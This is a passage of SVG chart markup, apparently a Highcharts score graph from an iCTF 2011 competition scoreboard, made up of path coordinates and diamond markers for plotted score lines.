239.01277480689248 169.62399922285715 L 240.98841354723712 169.5674119161904 L 242.96405228758175 168.62849991619038 L 244.93969102792636 168.62849991619038 L 246.915329768271 167.9460124342859 L 248.8909685086156 167.79926578285716 L 250.86660724896024 165.97237069714288 L 252.84224598930484 165.5128264685711 L 254.81788472964945 165.5128264685711 L 256.79352346999406 165.5128264685711 L 258.7691622103387 165.5128264685711 L 260.7448009506833 165.39585516190448 L 262.72043969102793 164.46915865904734 L 264.69607843137254 163.72828249904734 L 266.6717171717172 163.5307439390475 L 268.6473559120618 163.5307439390475 L 270.6229946524064 163.5307439390475 L 272.598633392751 163.5307439390475 L 274.5742721330957 163.5307439390475 L 276.5499108734403 163.5307439390475 L 278.5255496137849 163.5307439390475 L 280.50118835412957 163.5307439390475 L 282.4768270944742 163.5307439390475 L 284.4524658348188 163.5307439390475 L 286.4281045751634 163.5307439390475 L 288.40374331550805 163.5307439390475 L 290.37938205585266 163.5307439390475 L 292.35502079619727 163.50232793904752 L 294.33065953654193 161.72835765333323 L 296.30629827688654 161.1528829104761 L 298.28193701723114 158.30970988190467 L 300.25757575757575 155.5378813104761 L 302.2332144979204 151.96977045333324 L 304.208853238265 150.2266089752384 L 306.1844919786096 148.96361362285666 L 308.1601307189543 146.31711990857093 L 310.1357694592989 143.8973452799995 L 312.1114081996435 142.40965097142808 L 314.0870469399881 140.74403134476148 L 316.0626856803328 140.74403134476148 L 318.0383244206774 140.74403134476148 L 320.013963161022 140.74403134476148 L 321.98960190136665 140.74403134476148 L 323.96524064171126 140.74403134476148 L 325.94087938205587 140.74403134476148 L 327.9165181224005 138.7463865447615 L 329.89215686274514 136.84611728761863 L 331.86779560308975 135.05119020190435 L 333.84343434343435 134.13172963047577 L 335.81907308377896 133.22144336761863 L 337.7947118241236 132.39389164190382 L 339.77035056446823 131.7632582857133 L 341.74598930481284 130.97254023618973 L 343.7216280451575 129.97807326476112 L 345.6972667855021 129.4970456380945 L 347.6729055258467 128.3369624380945 L 349.6485442661913 127.31116175238074 L 351.624183006536 126.8695055085712 L 353.5998217468806 126.6549579428569 L 355.5754604872252 126.24255608380903 L 357.55109922756986 125.94201628952334 L 359.52673796791447 125.56161400380904 L 361.5023767082591 125.15929644190473 L 363.4780154486037 124.89065473523794 L 365.45365418894835 124.64328330666652 L 367.42929292929296 124.60776330666653 L 369.40493166963756 124.60776330666653 L 371.3805704099822 124.60776330666653 L 373.35620915032683 124.60776330666653 L 375.33184789067144 124.60776330666653 L 377.30748663101605 124.60776330666653 L 379.2831253713607 124.60776330666653 L 381.2587641117053 124.60776330666653 L 383.2344028520499 124.60776330666653 L 385.2100415923946 124.60776330666653 L 387.1856803327392 124.60776330666653 L 389.1613190730838 124.60776330666653 L 391.1369578134284 124.60776330666653 L 393.1125965537731 124.56621054476187 L 395.0882352941177 124.56621054476187" fill="none" stroke="#7798BF" stroke-width="2"></path><path d="M 395 120.5 L 399 124.5 395 128.5 391 124.5 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 393 120.5 L 397 124.5 393 128.5 389 124.5 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 391 120.5 L 395 124.5 391 128.5 387 124.5 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 389 120.5 L 393 124.5 389 128.5 385 124.5 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 387 120.5 L 391 124.5 387 128.5 383 124.5 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 385 120.5 L 389 124.5 385 128.5 381 124.5 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 383 120.5 L 387 124.5 383 128.5 379 124.5 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 381.5 120.5 L 385.5 124.5 381.5 128.5 377.5 124.5 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 379.5 120.5 L 383.5 124.5 379.5 128.5 375.5 124.5 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 377.5 120.5 L 381.5 124.5 377.5 128.5 373.5 124.5 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 375.5 120.5 L 379.5 124.5 375.5 128.5 371.5 124.5 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 373.5 120.5 L 377.5 124.5 373.5 128.5 369.5 124.5 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 371.5 120.5 L 375.5 124.5 371.5 128.5 367.5 124.5 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 369.5 120.5 L 373.5 124.5 369.5 128.5 365.5 124.5 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 367.5 120.5 L 371.5 124.5 367.5 128.5 363.5 124.5 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 365.5 120.5 L 369.5 124.5 365.5 128.5 361.5 124.5 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 363.5 121 L 367.5 125 363.5 129 359.5 125 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 361.5 121 L 365.5 125 361.5 129 357.5 125 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 359.5 121.5 L 363.5 125.5 359.5 129.5 355.5 125.5 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 357.5 122 L 361.5 126 357.5 130 353.5 126 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 355.5 122 L 359.5 126 355.5 130 351.5 126 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 353.5 122.5 L 357.5 126.5 353.5 130.5 349.5 126.5 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 351.5 123 L 355.5 127 351.5 131 347.5 127 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 349.5 123.5 L 353.5 127.5 349.5 131.5 345.5 127.5 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 347.5 124.5 L 351.5 128.5 347.5 132.5 343.5 128.5 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 345.5 125.5 L 349.5 129.5 345.5 133.5 341.5 129.5 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 343.5 126 L 347.5 130 343.5 134 339.5 130 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 341.5 127 L 345.5 131 341.5 135 337.5 131 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 340 128 L 344 132 340 136 336 132 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 338 128.5 L 342 132.5 338 136.5 334 132.5 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 336 129 L 340 133 336 137 332 133 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 334 130 L 338 134 334 138 330 134 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 332 131 L 336 135 332 139 328 135 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 330 133 L 334 137 330 141 326 137 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 328 134.5 L 332 138.5 328 142.5 324 138.5 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 326 136.5 L 330 140.5 326 144.5 322 140.5 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 324 136.5 L 328 140.5 324 144.5 320 140.5 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 322 136.5 L 326 140.5 322 144.5 318 140.5 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 320 136.5 L 324 140.5 320 144.5 316 140.5 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 318 136.5 L 322 140.5 318 144.5 314 140.5 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 316 136.5 L 320 140.5 316 144.5 312 140.5 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 314 136.5 L 318 140.5 314 144.5 310 140.5 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 312 138.5 L 316 142.5 312 146.5 308 142.5 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 310 140 L 314 144 310 148 306 144 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 308 142.5 L 312 146.5 308 150.5 304 146.5 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 306 145 L 310 149 306 153 302 149 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 304 146 L 308 150 304 154 300 150 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 302 148 L 306 152 302 156 298 152 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 300.5 151.5 L 304.5 155.5 300.5 159.5 296.5 155.5 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 298.5 154.5 L 302.5 158.5 298.5 162.5 294.5 158.5 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 296.5 157 L 300.5 161 296.5 165 292.5 161 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 294.5 157.5 L 298.5 161.5 294.5 165.5 290.5 161.5 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 292.5 159.5 L 296.5 163.5 292.5 167.5 288.5 163.5 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 290.5 159.5 L 294.5 163.5 290.5 167.5 286.5 163.5 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 288.5 159.5 L 292.5 163.5 288.5 167.5 284.5 163.5 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 286.5 159.5 L 290.5 163.5 286.5 167.5 282.5 163.5 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 284.5 159.5 L 288.5 163.5 284.5 167.5 280.5 163.5 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 282.5 159.5 L 286.5 163.5 282.5 167.5 278.5 163.5 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 280.5 159.5 L 284.5 163.5 280.5 167.5 276.5 163.5 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 278.5 159.5 L 282.5 163.5 278.5 167.5 274.5 163.5 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 276.5 159.5 L 280.5 163.5 276.5 167.5 272.5 163.5 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 274.5 159.5 L 278.5 163.5 274.5 167.5 270.5 163.5 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 272.5 159.5 L 276.5 163.5 272.5 167.5 268.5 163.5 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 270.5 159.5 L 274.5 163.5 270.5 167.5 266.5 163.5 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 268.5 159.5 L 272.5 163.5 268.5 167.5 264.5 163.5 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 266.5 159.5 L 270.5 163.5 266.5 167.5 262.5 163.5 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 264.5 159.5 L 268.5 163.5 264.5 167.5 260.5 163.5 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 262.5 160.5 L 266.5 164.5 262.5 168.5 258.5 164.5 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 260.5 161.5 L 264.5 165.5 260.5 169.5 256.5 165.5 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 259 161.5 L 263 165.5 259 169.5 255 165.5 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 257 161.5 L 261 165.5 257 169.5 253 165.5 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 255 161.5 L 259 165.5 255 169.5 251 165.5 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 253 161.5 L 257 165.5 253 169.5 249 165.5 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 251 162 L 255 166 251 170 247 166 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 249 164 L 253 168 249 172 245 168 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 247 164 L 251 168 247 172 243 168 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 245 164.5 L 249 168.5 245 172.5 241 168.5 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 243 164.5 L 247 168.5 243 172.5 239 168.5 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 241 165.5 L 245 169.5 241 173.5 237 169.5 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 239 165.5 L 243 169.5 239 173.5 235 169.5 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 237 165.5 L 241 169.5 237 173.5 233 169.5 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 235 167 L 239 171 235 175 231 171 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 233 173 L 237 177 233 181 229 177 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 231 183.5 L 235 187.5 231 191.5 227 187.5 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 229 192 L 233 196 229 200 225 196 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 227 199 L 231 203 227 207 223 203 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 225 208 L 229 212 225 216 221 212 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 223 217.5 L 227 221.5 223 225.5 219 221.5 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 221 230.5 L 225 234.5 221 238.5 217 234.5 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 219.5 243.5 L 223.5 247.5 219.5 251.5 215.5 247.5 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 217.5 246.5 L 221.5 250.5 217.5 254.5 213.5 250.5 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 215.5 247.5 L 219.5 251.5 215.5 255.5 211.5 251.5 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 213.5 249 L 217.5 253 213.5 257 209.5 253 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 211.5 249 L 215.5 253 211.5 257 207.5 253 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 209.5 249 L 213.5 253 209.5 257 205.5 253 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 207.5 249.5 L 211.5 253.5 207.5 257.5 203.5 253.5 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 205.5 249.5 L 209.5 253.5 205.5 257.5 201.5 253.5 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 203.5 249.5 L 207.5 253.5 203.5 257.5 199.5 253.5 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 201.5 249.5 L 205.5 253.5 201.5 257.5 197.5 253.5 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 199.5 249.5 L 203.5 253.5 199.5 257.5 195.5 253.5 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 197.5 249.5 L 201.5 253.5 197.5 257.5 193.5 253.5 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 195.5 249.5 L 199.5 253.5 195.5 257.5 191.5 253.5 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 193.5 249.5 L 197.5 253.5 193.5 257.5 189.5 253.5 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 191.5 249.5 L 195.5 253.5 191.5 257.5 187.5 253.5 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 189.5 249.5 L 193.5 253.5 189.5 257.5 185.5 253.5 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 187.5 249.5 L 191.5 253.5 187.5 257.5 183.5 253.5 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 185.5 249.5 L 189.5 253.5 185.5 257.5 181.5 253.5 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 183.5 249.5 L 187.5 253.5 183.5 257.5 179.5 253.5 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 181.5 249.5 L 185.5 253.5 181.5 257.5 177.5 253.5 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 179.5 249.5 L 183.5 253.5 179.5 257.5 175.5 253.5 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 178 249.5 L 182 253.5 178 257.5 174 253.5 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 176 249.5 L 180 253.5 176 257.5 172 253.5 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 174 249.5 L 178 253.5 174 257.5 170 253.5 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 172 249.5 L 176 253.5 172 257.5 168 253.5 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 170 249.5 L 174 253.5 170 257.5 166 253.5 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 168 249.5 L 172 253.5 168 257.5 164 253.5 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 166 249.5 L 170 253.5 166 257.5 162 253.5 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 164 249.5 L 168 253.5 164 257.5 160 253.5 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 162 249.5 L 166 253.5 162 257.5 158 253.5 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 160 249.5 L 164 253.5 160 257.5 156 253.5 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 158 249.5 L 162 253.5 158 257.5 154 253.5 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 156 249.5 L 160 253.5 156 257.5 152 253.5 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 154 249.5 L 158 253.5 154 257.5 150 253.5 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 152 249.5 L 156 253.5 152 257.5 148 253.5 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 150 249.5 L 154 253.5 150 257.5 146 253.5 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 148 249.5 L 152 253.5 148 257.5 144 253.5 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 146 249.5 L 150 253.5 146 257.5 142 253.5 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 144 249.5 L 148 253.5 144 257.5 140 253.5 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 142 249.5 L 146 253.5 142 257.5 138 253.5 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 140 249.5 L 144 253.5 140 257.5 136 253.5 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 138.5 249.5 L 142.5 253.5 138.5 257.5 134.5 253.5 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 136.5 249.5 L 140.5 253.5 136.5 257.5 132.5 253.5 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 134.5 249.5 L 138.5 253.5 134.5 257.5 130.5 253.5 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 132.5 249.5 L 136.5 253.5 132.5 257.5 128.5 253.5 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 130.5 249.5 L 134.5 253.5 130.5 257.5 126.5 253.5 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 128.5 249.5 L 132.5 253.5 128.5 257.5 124.5 253.5 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 126.5 249.5 L 130.5 253.5 126.5 257.5 122.5 253.5 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 124.5 249.5 L 128.5 253.5 124.5 257.5 120.5 253.5 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 122.5 249.5 L 126.5 253.5 122.5 257.5 118.5 253.5 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 120.5 249.5 L 124.5 253.5 120.5 257.5 116.5 253.5 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 118.5 249.5 L 122.5 253.5 118.5 257.5 114.5 253.5 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 116.5 249.5 L 120.5 253.5 116.5 257.5 112.5 253.5 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 114.5 249.5 L 118.5 253.5 114.5 257.5 110.5 253.5 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 112.5 249.5 L 116.5 253.5 112.5 257.5 108.5 253.5 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 110.5 249.5 L 114.5 253.5 110.5 257.5 106.5 253.5 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 108.5 249.5 L 112.5 253.5 108.5 257.5 104.5 253.5 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 106.5 249.5 L 110.5 253.5 106.5 257.5 102.5 253.5 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 104.5 249.5 L 108.5 253.5 104.5 257.5 100.5 253.5 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 102.5 249.5 L 106.5 253.5 102.5 257.5 98.5 253.5 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 100.5 249.5 L 104.5 253.5 100.5 257.5 96.5 253.5 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 98.5 249.5 L 102.5 253.5 98.5 257.5 94.5 253.5 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 97 249.5 L 101 253.5 97 257.5 93 253.5 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 95 249.5 L 99 253.5 95 257.5 91 253.5 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 93 249.5 L 97 253.5 93 257.5 89 253.5 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 91 249.5 L 95 253.5 91 257.5 87 253.5 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 89 249.5 L 93 253.5 89 257.5 85 253.5 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 87 249.5 L 91 253.5 87 257.5 83 253.5 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 85 249.5 L 89 253.5 85 257.5 81 253.5 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 83 249.5 L 87 253.5 83 257.5 79 253.5 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 81 249.5 L 85 253.5 81 257.5 77 253.5 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 79 249.5 L 83 253.5 79 257.5 75 253.5 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 77 249.5 L 81 253.5 77 257.5 73 253.5 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 75 249.5 L 79 253.5 75 257.5 71 253.5 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 73 249.5 L 77 253.5 73 257.5 69 253.5 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 71 249.5 L 75 253.5 71 257.5 67 253.5 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 69 249.5 L 73 253.5 69 257.5 65 253.5 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 67 249.5 L 71 253.5 67 257.5 63 253.5 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 65 249.5 L 69 253.5 65 257.5 61 253.5 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 63 249.5 L 67 253.5 63 257.5 59 253.5 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 61 249.5 L 65 253.5 61 257.5 57 253.5 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 59 249.5 L 63 253.5 59 257.5 55 253.5 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 57.5 249.5 L 61.5 253.5 57.5 257.5 53.5 253.5 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 55.5 249.5 L 59.5 253.5 55.5 257.5 51.5 253.5 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 53.5 249.5 L 57.5 253.5 53.5 257.5 49.5 253.5 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 51.5 249.5 L 55.5 253.5 51.5 257.5 47.5 253.5 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 49.5 249.5 L 53.5 253.5 49.5 257.5 45.5 253.5 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 47.5 249.5 L 51.5 253.5 47.5 257.5 43.5 253.5 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 45.5 249.5 L 49.5 253.5 45.5 257.5 41.5 253.5 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 43.5 249.5 L 47.5 253.5 43.5 257.5 39.5 253.5 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 41.5 249.5 L 45.5 253.5 41.5 257.5 37.5 253.5 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 39.5 249.5 L 43.5 253.5 39.5 257.5 35.5 253.5 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 37.5 249.5 L 41.5 253.5 37.5 257.5 33.5 253.5 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 35.5 249.5 L 39.5 253.5 35.5 257.5 31.5 253.5 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 33.5 249.5 L 37.5 253.5 33.5 257.5 29.5 253.5 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 31.5 249.5 L 35.5 253.5 31.5 257.5 27.5 253.5 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 29.5 249.5 L 33.5 253.5 29.5 257.5 25.5 253.5 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 27.5 249.5 L 31.5 253.5 27.5 257.5 23.5 253.5 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 25.5 249.5 L 29.5 253.5 25.5 257.5 21.5 253.5 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 23.5 249.5 L 27.5 253.5 23.5 257.5 19.5 253.5 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 21.5 249.5 L 25.5 253.5 21.5 257.5 17.5 253.5 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 19.5 249.5 L 23.5 253.5 19.5 257.5 15.5 253.5 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 17.5 249.5 L 21.5 253.5 17.5 257.5 13.5 253.5 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 16 249.5 L 20 253.5 16 257.5 12 253.5 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 14 249.5 L 18 253.5 14 257.5 10 253.5 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 12 249.5 L 16 253.5 12 257.5 8 253.5 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 10 249.5 L 14 253.5 10 257.5 6 253.5 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 8 249.5 L 12 253.5 8 257.5 4 253.5 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 6 249.5 L 10 253.5 6 257.5 2 253.5 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 4 249.5 L 8 253.5 4 257.5 0 253.5 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path></g><g class="highcharts-series" clip-path="url(http://scoreboard.ictf2011.info/score-graph.html#highcharts-185)" visibility="visible" transform="translate(75,55)"><path d="M 3.9117647058823533 253.71428571428572 L 5.887403446226976 253.71428571428572 L 7.863042186571599 253.71428571428572 L 9.838680926916224 253.71428571428572 L 11.814319667260847 253.71428571428572 L 13.78995840760547 253.71428571428572 L 